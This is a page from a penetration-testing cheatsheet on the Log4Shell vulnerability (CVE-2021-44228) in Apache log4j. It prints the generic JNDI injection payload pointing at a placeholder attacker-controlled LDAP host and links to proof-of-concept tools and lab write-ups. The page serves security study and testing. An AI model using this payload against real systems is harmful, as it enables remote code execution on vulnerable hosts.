✒️
Pentesting Cheatsheet
  • Introduction
  • Basics
  • Information Gathering | OSINT
  • Penetration Testing
    • Scanning and Enumeration
    • HTTP and HTTPS
    • SMB | Windows Domain Enumeration
    • NFS
    • SMTP
    • Reverse Shells
    • Buffer Overflow | Buf Exploitation
    • Linux Privilege Escalation
    • Miscellaneous
    • Redis
  • Active Directory
    • AD Extras
    • Attack Vectors
    • Post Compromise Enumeration
    • Post Compromise Attacks
  • Pivoting
  • Windows Privesc
    • Window Tools/Resources
    • Meterpreter Privesc
    • Powershell Scripting
  • Vulnhub/ PG/ THM/ HTB
  • Apache Log4j
  • Linux Forensics Cheatsheet
Powered by GitBook
On this page

Was this helpful?

Apache Log4j

Exploiting Apache Java logging framework

PreviousVulnhub/ PG/ THM/ HTBNextLinux Forensics Cheatsheet

Last updated 2 years ago

Was this helpful?

CVE-2021-44228

On December 9th, 2021, the world was made aware of a new vulnerability identified as CVE-2021-44228, affecting the Java logging package log4j. This vulnerability earned a severity score of 10.0 (the most critical designation) and offers remote code trivial remote code execution on hosts engaging with software that utilizes this log4j version. This attack has been dubbed "Log4Shell"

The general payload to abuse this log4j vulnerability. The format of the usual syntax that takes advantage of this looks like:

${jndi:ldap://ATTACKERCONTROLLEDHOST}

LDAP Referral Server

Resources/POC

LogoGitHub - mbechler/marshalsecGitHub
LogoGitHub - veracode-research/rogue-jndi: A malicious LDAP server for JNDI injection attacksGitHub
LogoHuntress - Log4Shell Tester
LogoTryHackMe | Solar, exploiting log4jTryHackMe
LogoNVD - CVE-2021-44228
LogoGitHub - YfryTchsGD/Log4jAttackSurfaceGitHub
LogoWrite-Up: Hack The Box: Starting Point — Unified (Tier 2)Medium